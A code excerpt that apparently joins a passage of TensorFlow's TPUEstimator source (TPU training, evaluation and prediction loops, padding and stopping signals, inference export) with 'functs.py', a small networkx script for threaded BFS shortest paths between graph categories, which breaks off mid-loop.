scaffold = _get_scaffold(scaffold_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops(ctx)
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yield the element (via generator) to call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoid the issue we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions,
message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
host_ops = [] # Empty, we do do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx, enqueue_ops, host_ops, rendezvous=self._rendezvous[mode],
tpu_compile_op=compile_op,
master=self._config.master,
session_config=self._session_config),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return list(export_output.outputs.values())
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_eval_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_eval_step,
[_ZERO_LOSS])
(compile_op, loss,) = tpu.split_compile_and_shard(
multi_tpu_eval_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_calls, captured_scaffold_fn,
captured_eval_hooks.get())
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_train_step, host_call, captured_scaffold_fn,
captured_training_hooks) = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
@tpu_function.on_device_training_loop
def multi_tpu_train_steps_on_single_shard():
outputs = training_loop.while_loop(
lambda i, loss : i < iterations_per_loop_var,
lambda i, loss : [i + 1, single_tpu_train_step(i)],
inputs=[0, _INITIAL_LOSS])
return outputs[1:]
(compile_op, loss,) = tpu.split_compile_and_shard(
multi_tpu_train_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_call, captured_scaffold_fn,
captured_training_hooks.get())
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(single_tpu_predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_predict_steps_on_single_shard():
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
(compile_op, dummy_predict_op,) = tpu.split_compile_and_shard(
multi_tpu_predict_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
dummy_predict_op = dummy_predict_op[0]
return (compile_op, dummy_predict_op, host_calls, captured_scaffold_fn,
captured_predict_hooks.get())
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation, [constant_op.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return # b/124241278
operations = ops.get_default_graph().get_operations()
# Check if there is atleast one CrossReplicaSum operation in the graph
# This should be introduced by using the CrossShardOptimizer wrapper
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can capture only once. Please file bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file bug.')
return self._object
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def to_control_flow_context_def(self, context_def, export_scope=None):
# pylint: disable=useless-super-delegation
# NOTE(slebedev): the method is required by `ControlFlowContext`.
super(_CapturingContext, self).to_control_flow_context_def(
context_def, export_scope)
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.DatasetV2):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer(self):
"""Returns the dataset's initializer.
The initializer must be run before calling `features_and_labels`.
"""
self._iterator = dataset_ops.make_initializable_iterator(self._dataset)
return self._iterator.initializer
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must run dataset_initializer '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self,
dataset,
batch_size,
add_padding=False,
num_invocations_per_step=1):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
else:
# We append (2 * num_invocations_per_step - 1) batches for exhausting the
# user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1)
def _set_mask(data_dict):
signals = data_dict['signals']
signals['padding_mask'] = array_ops.ones_like(signals['padding_mask'])
data_dict['signals'] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# for the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(features, labels,
batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size,
padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return math_ops.logical_and(scalar_stopping_signal,
_StopSignals.STOPPING_SIGNAL)
else:
# For non Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(real_batch_size, missing_count,
batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. By that, the sliced padding mask should have all 0's.
# If this assertion failed, # the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [
x for x in nest.flatten(batch_features) if isinstance(x, ops.Tensor)
]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat([
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider to use Tensors with smaller shapes or reduce batch '
'size. Given:\n'
'{}'.format(
message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()
])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if hasattr(params, 'set_hparam'):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
def export_estimator_savedmodel(estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and returns a
`ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
Returns:
The string path to the exported directory.
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_saved_model(export_dir_base, serving_input_receiver_fn,
assets_extra, as_text, checkpoint_path)
def model_fn_inference_on_tpu(model_fn,
features,
labels=None,
config=None,
params=None,
batch_config=None):
"""Convenience wrapper for export_saved_model API v2 for a model_fn.
It attempts to execute the entire model function on the TPU for prediction.
Note that this does not support features which are SparseTensors. If you have
SparseTensor features, consider partitioning your model function further and
use inference_on_tpu.
Args:
model_fn: the model_fn for which we want to inference on TPU.
features: a tensor or dict of tensors, serves as the feature inputs to the
model.
labels: a tensor or dict of tensors, serves as the labels inputs to the
model.
config: auxiliary config to the Estimator.
params: hparams that we want to pass to the model_fn.
batch_config: a named tuple to wrap the inference batching configuration
inputs.
Returns:
An EstimatorSpec containing the outputs in export_outputs and predictions.
"""
computation, capture = _build_computation_for_inference(
model_fn, labels, config, params)
tensors = call_computation(
features,
computation,
batch_config=batch_config)
estimator_spec, export_outputs_dict, predictions_dict, none_indices = (
capture.get())
predictions_list = tensors[:len(predictions_dict)]
export_outputs_list_without_none = tensors[len(predictions_dict):]
# Reinsert `None`s which we've taken out in
# `_build_computation_for_inference()`.
export_outputs_list = []
while none_indices or export_outputs_list_without_none:
if none_indices and none_indices[0] == len(export_outputs_list):
export_outputs_list.append(None)
none_indices.pop(0)
else:
export_outputs_list.append(export_outputs_list_without_none.pop(0))
# Reconstruct `export_outputs` with updated tensors.
new_export_outputs_dict = nest.pack_sequence_as(export_outputs_dict,
export_outputs_list)
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_export_outputs_dict))
# Reconstruct `predictions` with updated tensors.
new_predictions = nest.pack_sequence_as(predictions_dict, predictions_list)
if (len(new_predictions) == 1 and
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR in new_predictions):
new_predictions = new_predictions[_KEY_WHEN_PREDICTIONS_IS_A_TENSOR]
return estimator_spec._replace(
export_outputs=new_export_outputs, predictions=new_predictions)
def _build_computation_for_inference(model_fn,
labels,
config,
params):
"""Builds the computation with calls the model_fn for inference."""
capture = _CapturedObject()
def computation(computation_input):
"""Computation to be passed to `TPUPartitionedCall()`."""
tpu_computation, tpu_capture = _build_tpu_computation_for_inference(
model_fn, computation_input, labels, config, params)
tensors_on_cpu = tpu.rewrite(tpu_computation)
tpu.prune_unconnected_ops_from_xla(ops.get_default_graph())
(estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict) = (
tpu_capture.get())
predictions_list = tensors_on_cpu[:len(predictions_dict)]
export_outputs_tpu_on_cpu_list = tensors_on_cpu[len(predictions_dict):]
# Reconstruct tensors used in export_outputs, with TPU tensors replaced
# with their CPU counterpart returned from `rewrite_for_inference()`.
# `function.Defun()` does not like `None`s in return values, so we leave
# `None`s out but record their positions for later reconstruction.
export_outputs_list_without_none = []
none_indices = []
for i, t in enumerate(export_outputs_list):
if t is None:
none_indices.append(i)
else:
export_outputs_list_without_none.append(
export_outputs_tpu_on_cpu_list.pop(0))
capture.capture(
(estimator_spec, export_outputs_dict, predictions_dict, none_indices))
return predictions_list + export_outputs_list_without_none
return computation, capture
def _build_tpu_computation_for_inference(model_fn, features, labels, config,
params):
"""Builds the TPU computation for inference on TPU."""
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
model_fn_args = function_utils.fn_args(model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
if 'labels' in model_fn_args:
kwargs['labels'] = labels
if 'mode' in model_fn_args:
kwargs['mode'] = model_fn_lib.ModeKeys.PREDICT
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
estimator_spec = model_fn(features, **kwargs)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
export_outputs_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs))
export_outputs_list = nest.flatten(export_outputs_dict)
export_outputs_tpu_list = [t for t in export_outputs_list if t is not None]
if isinstance(estimator_spec.predictions, dict):
predictions_dict = collections.OrderedDict(
(k, v) for k, v in six.iteritems(estimator_spec.predictions))
else:
predictions_dict = {
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR: estimator_spec.predictions
}
predictions_list = nest.flatten(predictions_dict)
# We cannot return everything we want through the return values, so
# capture the rest here for later use.
capture.capture((estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict))
return predictions_list + export_outputs_tpu_list
return computation, capture
def inference_on_tpu(computation,
inputs_to_tpu,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes=None,
max_enqueued_batches=10):
"""Convenient wrapper for export_saved_model API v2 to wrap TPU computation.
It puts computation on TPU, add batching around it and round robin computation
between TPU cores.
See tpu_estimator_test.py for an example.
Args:
computation: computation to be put on TPU, which takes inputs_to_tpu as
arguments.
inputs_to_tpu: a list of tensors as input to computation.
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op to
pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to 10.
Returns:
The unbatched computation output Tensors.
"""
@batch_ops.batch_function(num_batch_threads, max_batch_size,
batch_timeout_micros, allowed_batch_sizes,
max_enqueued_batches)
def batched_tpu_computation(*args):
@function.Defun(capture_resource_var_by_value=False)
def tpu_computation():
return tpu.rewrite(computation, args)
return tpu_functional.TPUPartitionedCall(
args=tpu_computation.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_computation.definition.signature.output_arg],
f=tpu_computation)
return batched_tpu_computation(*inputs_to_tpu)
|
functs.py
|
import numpy as np
import pandas as pd
import math
import networkx as nx
import csv
from statistics import median, mean
import queue as Q
import threading
from numba import autojit
# function to open dicts we saved
def open_dict(vocabularyFile):
cats = open(vocabularyFile, 'r', encoding = "utf8").readlines()
cats2 = {}
for cat in cats:
templ = []
for x in cat.split():
templ.append(x.strip("[").strip("]").strip("'").strip(",").rstrip("''").rstrip('\n'))
try:
int(templ[1])
cats2[templ[0]] = templ[1:]
except:
cats2[templ[0]] = " ".join(templ[1:])
return cats2
# function to save our vocabulary file to disk
def save_dict(vocabulary,fileName="output.csv"):
with open(fileName,'wb') as vfile:
for i in vocabulary.keys():
vfile.write(str(i).encode())
vfile.write(str('\t').encode())
vfile.write(str(vocabulary[i]).encode())
vfile.write('\n'.encode())
vfile.close()
# function to look for the shortest path
def bfs(graph, inp_cat, inp_node, dest_cat, out_q):
# creating a queue
queue = Q.Queue()
#putting the current node in the queue
queue.put([inp_node, 0])
# defining a dictionary to check if we already visited the nodes of graph
visited = {}
# setting the distance of the current node to infinity as a default
sh_path = np.inf
# setting visited to False for every node in the graph
for x in graph.nodes:
visited[x] = False
# check for shortest paths as long as the queue is not empty
while queue.empty() != True:
# get the node we put in first
current = queue.get()
# check if the entry we got from the queue is in the destinatino category and not in the input category
if graph.node[current[0]][dest_cat] == True and graph.node[current[0]][inp_cat] != True:
# if its true, set visited #uneccessary step as well break after anyway
visited[current[0]]= True
# update the shortest path if we found one, else will stay infinitive
sh_path = current[1]
#print('shortest path from ', inp_node, ' to ', current[0], ' found (dist = ', current[1], ')')
queue.queue.clear()
else:
# get the successors of our current node (as its a directed graph)
for i in graph.successors(current[0]):
# check if the successor is not visited
if visited[i] != True:
# if its not visited, put the found node in the queue,
# together with the information about the distance it has from the starting node
queue.put([i, current[1]+1])
# set the current node to visited
visited[current[0]]= True
# put the result we found
out_q.put([inp_node, sh_path])
# function to execute the bfs
def run_bfs(start_cat, graph, categories):
#creating a list of nodes of our starting category
inp_nodes = [cat_nodes for cat_nodes in graph.nodes if graph.node[cat_nodes][start_cat]== True]
# create a dictionary we want to save the medians and other information to
medians = {}
#iterate over all categories in the list of categories
for cat in categories:
# creating a dictionary we save the information for every node the bfs returnd
sh_paths = {}
# iterate only over the categories that aren't our C0
if cat != start_cat:
# setting the destination category to be passed to our bfs
dest_cat = cat
# creating a queue that contains the nodes we want to pass to the bfs
start_q = Q.Queue()
# creating a queue that we'll pass the results of our bfs to
out_q = Q.Queue()
# adding the nodes of our C0 to the start_q. every node will be passed to our bfs
for start_node in inp_nodes:
start_q.put(start_node)
# while we didn't calculate the shortest distance for every node in our C0, do things
while not start_q.empty():
# as long as the number of running threads is at most 50, add threads
if threading.active_count() <= 50:
# get the current node from our start_q
current_t = start_q.get()
# start a thread with our bfs and the aforementioned parameters
t = threading.Thread(target=bfs, args=(graph, start_cat, current_t, dest_cat, out_q), daemon= True).start()
# tell the start_q that the task with current_t is done
start_q.task_done()
# while we didn't retrieve all values the bfs calculated, keep running
while not out_q.empty():
# get the first result in the queue
out_p = out_q.get()
# add the information to our shortest paths dictionary. the key is the node, the value the distance
